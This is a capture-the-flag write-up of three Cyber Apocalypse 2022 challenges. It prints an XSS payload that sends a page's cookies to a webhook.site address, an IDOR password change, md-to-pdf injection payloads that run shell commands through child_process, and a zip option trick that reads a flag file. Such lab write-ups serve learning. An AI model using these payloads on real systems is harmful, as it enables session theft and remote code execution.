Hi everyone.
Cyber Apocalypse 2022 was the first CTF I attended after a long time. It was a lot of fun even though I could solve 3 questions. Especially seeing “never gonna give you up” in some questions made me laugh a lot.
Anyway, let’s start
WEB
Kryptos Support
I’m starting the server and opening the browser
There’s an input field. I sent the xss, sqli … payloads but no result. Next step, I scanned the directories using gobuster.
Well, there’s a login page. Let’s see that.
I’ve no credentials. I tried the bypass but no result again. I back to the support page. After that, I started to think “Can I steal the cookies?”
First of all, I sent a simple xss payload and capture the request using burpsuite.
The response is not descriptive. So, I decided the use webhook.
<img src=x onerror=this.src='https://webhook.site/afd12148-5116-41cc-a13a-73c68798ef4e/?c='+document.cookie>
And I stole a session cookie.
I added the cookie to the browser storage and login as moderator.
When I looked at the settings page, I saw that there was a password change page.
I capture the request.
Hmm, there’s an uid. If I change the uid value, will the admin password change as well?
yeaah, admin pass changed. Let’s login as admin.
HTB{x55_4nd_id0rs_ar3_fun!!}BlinkerFluids
I’m starting the server and opening the browser
I opened the PDF.
I created a new invoice and review the request.
I saw the pdf content in the request. I tried code injection, lfi, xss etc. but no result. I downloaded the source code.
When I reviewed the files, I saw interesting code in “mdhelper.js”.
I googling the md-to-pdf vuln. I found something. https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880
According to the link, I sent to PoC that contains the “ls” command.
"---jsn((require("child_process")).execSync("ls > static/invoices/anan.txt"))n---RCE';"
There’s no output in pdf. But, when I look at the static/invoices/anan.txt …
Where is the flag.txt? Change the directory…
"---jsn((require("child_process")).execSync("ls / > static/invoices/anan.txt"))n---RCE';"
It’s here. Ok, Let’s see the flag.
"---jsn((require("child_process")).execSync("cat /flag.txt > static/invoices/anan.txt"))n---RCE';"
HTB{bl1nk3r_flu1d_f0r_int3rG4l4c7iC_tr4v3ls}Misc
Compressor
I’m started the server and opened telnet
Well, I reviewed the actions. But, I couldn’t anything.
The challenge name is compressor and 4’th action…..
I googling and found that. https://gtfobins.github.io/gtfobins/zip/
According to the link, I guess, I can read the file content. So let’s start
1) Find the directory
2) Create the zip file
insert <name> .zip : anan, insert <options> : cat /home/ctf/flag.txt3) Is the zip file generated?
4) Read the flag
HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5}